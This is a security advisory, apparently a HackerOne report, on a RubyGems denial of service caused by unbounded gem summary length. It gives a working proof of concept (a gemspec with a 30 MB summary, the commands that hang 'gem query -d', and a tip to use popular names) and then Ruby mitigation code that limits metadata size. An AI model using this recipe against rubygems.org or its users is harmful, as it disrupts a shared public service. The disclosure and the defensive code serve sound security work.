RubyGems: No limit of summary length allows Denial of Service

HackerOne report #243003, reported by mame on hackerone.com, Jun 25, 2017, 07:53

Severity

  CVSS v3.0: 7.5 High  (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
    Attack Vector: Network; Attack Complexity: Low; Privileges Required: None;
    User Interaction: None; Scope: Unchanged; Confidentiality: None;
    Integrity: None; Availability: High

  CVSS v2: 5.0 Medium  (AV:N/AC:L/Au:N/C:N/I:N/A:P)
    Access Vector: Network; Access Complexity: Low; Authentication: None;
    Confidentiality: None; Integrity: None; Availability: Partial

  EPSS: 0.025 (Low), percentile 89.0%

Currently, there is no limit on summary length. I think pushing a gem whose summary is huge will make gem search unavailable.

This is not arbitrary code execution, but it is really easy to attack. According to the CVSS v3.0 calculator, the severity is High (7.5).

How to attack

  1. An attacker creates a gem with a huge summary string and pushes it to rubygems.org.
  2. A victim runs gem search -d <substring-of-the-name-of-the-gem>, but it gives no response.

It may help if the gem name includes a frequently searched keyword, such as "foo-rails-bar" or "foo-sinatra-bar".

Proof of concept

  1. Prepare the following gemspec (huge-summary.gemspec):

     Gem::Specification.new do |spec|
       spec.name     = "huge-summary"
       spec.version  = "0.0.1"
       spec.authors  = ["Yusuke Endoh"]
       spec.email    = ["[email protected]"]
       spec.summary  = "foo" * 10000000   # a 30 MB summary with no whitespace
       spec.homepage = "http://example.com/"
       spec.license  = "MIT"
     end

  2. Run the following commands:

     gem build huge-summary.gemspec
     gem install huge-summary-0.0.1.gem

  3. Run the following command:

     gem query huge-summary -d

It will not respond.
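The obvious mitigation is the one the report title points at: bound the length of gem metadata. As an added example (this is not the RubyGems project's code or its actual fix; the limits, function names and the sample specs are assumptions constructed for illustration), the block below shows the two places where such a bound belongs: on the publish side, where an oversized spec is rejected before it is indexed, and on the display side, where a client such as a `gem search -d` style listing cuts the summary to the limit before handing it to any line wrapper, so an oversized field that is already in an index still costs bounded work. The sample "huge" spec uses the report's 30 MB `"foo" * 10000000` summary.

```ruby
require "rubygems"

# Assumed limits (illustrative; not constants defined by RubyGems or rubygems.org).
MAX_SUMMARY_BYTES     = 1_000
MAX_DESCRIPTION_BYTES = 10_000

class OversizedMetadata < StandardError; end

# Publish-side check: return [field, bytes, limit] for every metadata field
# over its byte limit. Byte size rather than character count, because bytes
# are what the index, the wire and the terminal actually have to carry.
def oversized_fields(spec)
  limits = { summary: MAX_SUMMARY_BYTES, description: MAX_DESCRIPTION_BYTES }
  limits.each_with_object([]) do |(field, limit), bad|
    bytes = spec.send(field).to_s.bytesize
    bad << [field, bytes, limit] if bytes > limit
  end
end

# Raise before the gem is accepted, indexed or written to disk.
def validate_metadata_size!(spec)
  bad = oversized_fields(spec)
  return true if bad.empty?

  detail = bad.map { |f, b, l| "#{f} is #{b} bytes (limit #{l})" }.join(", ")
  raise OversizedMetadata, "#{spec.name}-#{spec.version}: #{detail}"
end

# Greedy word wrapper that is linear in the input: a word longer than the
# width is split into fixed chunks instead of being re-scanned.
def wrap_text(text, width)
  lines = []
  current = +""
  text.split(/\s+/).each do |word|
    while word.length > width
      lines << current unless current.empty?
      current = +""
      lines << word[0, width]
      word = word[width..-1]
    end
    if current.empty?
      current = word.dup
    elsif current.length + 1 + word.length <= width
      current << " " << word
    else
      lines << current
      current = word.dup
    end
  end
  lines << current unless current.empty?
  lines
end

# Display-side check: truncate to the limit *before* wrapping or formatting,
# so the work done per listed gem is bounded by the limit, not by the spec.
def bounded_summary(spec, width: 80, indent: 4, limit: MAX_SUMMARY_BYTES)
  text = spec.summary.to_s
  if text.bytesize > limit
    # scrub drops a partial multibyte character left behind by the byte cut
    text = text.byteslice(0, limit).scrub("") + "..."
  end
  wrap_text(text, width).map { |line| (" " * indent) + line }.join("\n")
end

# Constructed sample specs: the report's 30 MB summary and a normal one.
HUGE_SPEC = Gem::Specification.new do |spec|
  spec.name    = "huge-summary"
  spec.version = "0.0.1"
  spec.summary = "foo" * 10_000_000
end

SMALL_SPEC = Gem::Specification.new do |spec|
  spec.name    = "small-summary"
  spec.version = "0.0.1"
  spec.summary = "A short summary"
end

if $PROGRAM_NAME == __FILE__
  puts bounded_summary(SMALL_SPEC)
  puts bounded_summary(HUGE_SPEC).lines.count   # 13 wrapped lines, not millions
  begin
    validate_metadata_size!(HUGE_SPEC)
  rescue OversizedMetadata => e
    puts "rejected: #{e.message}"
  end
end
```

The publish-side check is the real fix, since it keeps the oversized spec out of the index in the first place; the display-side truncation is defence in depth for clients that read indexes produced before such a limit existed. Whatever value is chosen for the limit, both sides should agree on it and measure it in bytes.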
